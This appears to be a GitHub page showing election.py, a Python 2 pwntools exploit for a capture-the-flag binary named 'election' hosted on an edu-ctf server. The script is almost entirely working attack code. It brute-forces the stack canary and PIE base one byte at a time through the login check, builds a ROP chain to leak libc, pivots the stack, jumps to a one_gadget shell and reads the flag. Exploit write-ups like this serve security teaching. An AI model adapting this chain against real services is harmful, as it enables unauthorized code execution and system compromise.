-
Notifications
You must be signed in to change notification settings - Fork 39
/
Copy pathelection.py
executable file
·132 lines (98 loc) · 2.36 KB
/
election.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#!/usr/bin/env python
from pwn import *
context.arch = 'amd64'
e , l = ELF( '../election/share/election' ) , ELF( './libc-2.27.so' )
y = remote( 'localhost' , 10180 )
#y = remote( 'edu-ctf.csie.org' , 10180 )
#y = process( '../election/share/election' )
#pause()
def login( tok ):
y.sendafter( '>' , '1' )
y.sendafter( ':' , tok )
def reg( tok ):
y.sendafter( '>' , '2' )
y.sendafter( ':' , tok )
def logout():
y.sendafter( '>' , '3' )
def vote( idx ):
y.sendafter( '>' , '1' )
y.sendafter( ':' , str( idx ) )
def say( idx , data ):
y.sendafter( '>' , '2' )
y.sendafter( ':' , str( idx ) )
y.sendafter( 'Message: ' , data )
reg( 'a' * 0xb8 )
tok = 'a' * 0xb8
canary = '\0'
for i in range( 7 ):
print i
for c in map( chr , range( 0xff , -1 , -1 ) ):
login( tok + canary + c )
o = y.recvline()
if 'Invalid token' not in o:
canary += c
info( hex( u64( canary.ljust( 8 , '\0' ) ) ) )
logout()
break
success( 'cananry -> %s' % hex( u64( canary ) ) )
pie = ''
for i in range( 6 ):
print i
for c in map( chr , range( 0xff , -1 , -1 ) ):
login( tok + canary + pie + c )
o = y.recvline()
if 'Invalid token' not in o:
pie += c
info( hex( u64( pie.ljust( 8 , '\0' ) ) ) )
logout()
break
pie = u64( pie.ljust( 8 , '\0' ) ) - 0x1140
e.address = pie
success( 'pie -> %s' % hex( pie ) )
for i in range( 25 ):
print i
reg( 'a' )
login( 'a' )
for j in range(10):
vote( 1 )
logout()
reg( 'a' )
login( 'a' )
for j in range(5):
vote( 1 )
logout()
buf = pie + 0x202160
leave_ret = pie + 0xbe9
pop_rdi = pie + 0x11a3
csu = pie + 0x1180
ppppppr = pie + 0x119a # pop rbx; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
p = flat(
0,
pop_rdi,
e.got.__libc_start_main,
e.plt.puts,
ppppppr,
0, 1, buf + 0xa0, 0, buf + 0xa0 - 8, 0x100,
csu,
0, 0, 0, 0, 0, 0, 0,
0x7777777,
e.plt.read
)
login( p )
login( 'a' )
p = flat(
'a' * 0xe8,
canary,
buf,
leave_ret
)
say( 1 , p[:-1] )
logout()
y.recvline()
l.address = u64( y.recv(6) + '\0\0' ) - l.sym.__libc_start_main
success( 'libc -> %s' % hex( l.address ) )
one = 0x10a38c
y.send( p64( l.address + one ) )
sleep( 0.3 )
y.sendline( 'cat /home/`whoami`/flag' )
y.interactive()